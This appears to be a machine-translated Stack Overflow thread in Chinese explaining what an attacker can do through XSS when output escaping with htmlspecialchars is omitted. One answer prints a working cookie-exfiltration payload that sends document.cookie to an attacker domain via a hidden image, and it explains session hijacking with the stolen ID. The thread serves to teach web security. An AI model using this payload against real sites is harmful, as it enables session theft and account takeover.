因此,防止网站遭受XSS攻击非常简单,您只需使用htmlspecialchars功能就可以了。
但如果开发人员忘记使用它,攻击者/黑客可以做些什么呢?他可以得到你的session_id,对吗?这是一个问题。他能做些什么呢?
非常感谢你。
答案 0 :(得分:9)
因此,防止网站遭受XSS攻击非常简单,你只需要使用htmlspecialchars功能就可以了。
右。当您要重新显示用户控制的输入时,可以在任何地方使用它。这涉及HTTP请求的所有部分:标题,正文和参数。
他/她可以插入一些恶意HTML /脚本。例如。以下是网页上的一些消息/评论:但如果开发人员忘记使用它,那么攻击者/黑客可以做些什么呢?
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
以上内容将请求来自mailicious域的图像以及文档cookie作为查询字符串。
他可以得到你的session_id,对吗?这是一个问题。他能做些什么呢?
会话ID存储在cookie中。一旦黑客被告知已经使用查询字符串中的cookie请求了图像,他/她只需要编辑浏览器的cookie以包含相同的会话ID以便以原始用户身份登录。如果原始用户是站点管理员,这显然是非常危险的。
答案 1 :(得分:6)
这是我遇到过的最简单的XSS解释:Flash Animation Example
答案 2 :(得分:1)
攻击者A通过A精心构建的URI,使用B的凭据获得成员B访问站点C.
然后,A可以使用B的凭据在C上运行他们喜欢的任何JS。
这允许他们:
答案 3 :(得分:0)
答案 4 :(得分:0)
如果您的网站上有XSS漏洞,则黑客可以在页面中插入任何HTML,包括<script>标记。如果我登录到您的网站并访问受攻击的页面,我的浏览器将运行黑客插入的JavaScript,并让我的浏览器执行黑客的任何操作。
例如向您的服务器发送POST请求以更改我的密码,然后从黑客的服务器加载URL以通知他我的帐号,以便他可以登录并窃取我的帐户。